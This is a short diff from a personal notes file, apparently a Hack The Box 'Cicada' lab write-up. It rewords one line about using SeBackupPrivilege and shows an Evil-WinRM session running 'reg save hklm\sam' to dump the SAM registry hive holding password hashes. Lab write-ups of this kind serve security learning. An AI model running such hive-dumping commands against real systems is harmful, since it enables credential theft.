wither/obsidian-notes/05-Boxes/HTB/Cicada.md

 ### Registry Hive Extraction

-`SeBackupPrivilege` allowed reading any file on the system, including protected registry hives containing password hashes:
+I used this permission to extract and download the `SAM` and `SYSTEM` registry hives to my machine.
 ```powershell
 *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam
 The operation completed successfully.